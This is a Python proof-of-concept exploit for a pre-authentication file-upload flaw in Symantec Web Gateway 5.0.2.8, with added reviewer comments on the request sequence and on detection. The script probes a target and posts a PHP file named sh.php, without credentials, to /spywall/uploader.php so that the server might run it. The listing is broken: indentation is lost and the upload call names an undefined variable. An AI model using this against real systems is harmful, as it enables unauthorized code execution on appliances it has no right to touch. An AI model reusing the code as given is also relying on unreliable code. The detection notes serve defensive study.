Symantec Web Gateway version 5.0.2.8 pre-authentication remote code execution exploit.
4626e1e8d0204fec4863f5b78c64b0a5
# Title: Preauth RCE in Symantec Web Gateway 5.0.2.8
# Date: 26.03.2020
# Vendor: www.symantec.com
# Vulnerable software: www.symantec.com
# Repo: https://github.com/c610/free/
#!/usr/bin/env python
# seemantech.py - small preauth poc for symantec web gateway
# 27.03.2020 by code610
#
# more : https://twitter.com/CodySixteen
# https://code610.blogspot.com
#
# to use this bug:
# - uploads folder must exist on remote host
# - and it must be writable
#
# have fun
#
import sys, re
import requests
# Base URL of the appliance under test, read from the first command-line
# argument at import time. Nothing validates it: a missing argument raises
# IndexError before main() is reached, and the string is concatenated into
# request URLs unchanged.
target = sys.argv[1]
# main(): probe the host named by the module-level `target` and attempt one
# file upload without sending any credentials or session cookie.
#
# Request sequence as listed (usable as a signature when reviewing the
# appliance's web access logs):
#   1. GET  <target>                       - liveness check, expects HTTP 200
#   2. GET  <target>/uploads/              - checks that the uploads path answers 200
#   3. POST <target>/spywall/uploader.php  - multipart upload
# Takes no parameters and returns nothing; progress is printed to stdout.
#
# NOTE(review): block indentation was lost in this listing, so the nesting of
# the two `if` bodies cannot be recovered with certainty. Presumably the
# upload is attempted only when both checks return 200 - confirm against the
# original repository.
# NOTE(review): as listed, this script does not run to completion (Python 2
# print statements, lost indentation, and an undefined name in the upload
# call). Read it as a description of the request sequence rather than as a
# tool for validating a fix.
def main():
print 'symantec web gateway preauth rce poc'
print ' seemantech.py - vs - %s' % ( target )
print ''
# baseUrl is assigned here but not referenced again in the visible code.
baseUrl = target
uploadUrl = target + '/uploads/'
# verify=False turns off TLS certificate validation for every request made
# by this script.
checkBase = requests.get(target,verify=False)
check_status = checkBase.status_code
# Only an exact 200 counts as "alive"; there is no visible else branch, so
# any other status produces no output.
if check_status == 200:
print '[+] target alive, checking uploads'
checkUpload = requests.get(uploadUrl, verify=False)
isthereupload = checkUpload.status_code
# A 200 here shows only that the path responds. The header comment's second
# precondition (the folder being writable) is not tested by this request.
if isthereupload == 200:
print '[+] uploads exists! continuing...'
uploader = target + '/spywall/uploader.php'
# Writes a local file named sh.php into the current working directory. Its
# content is a bare phpinfo() call, i.e. a marker page that would display
# the PHP configuration if the server stored and executed it.
# Detection idea: requests to /spywall/uploader.php that carry no
# authenticated session, and unexpected .php files under /uploads/.
upshell = open('sh.php','w')
upshell.write('<?php phpinfo();')
upshell.close()
# Multipart form data: field name 'file', with the local sh.php as its body.
up_data = {
'file':open('sh.php','rb')
}
upme = requests.post(uploader, files=files, verify=False)
# The raw response body is printed as-is; the script does not check whether
# the upload was accepted.
upresp = upme.text
print upresp
# Script entry point: run main() only when the file is executed directly.
# The module-level read of sys.argv[1] still happens on import either way.
if __name__ == '__main__':
main()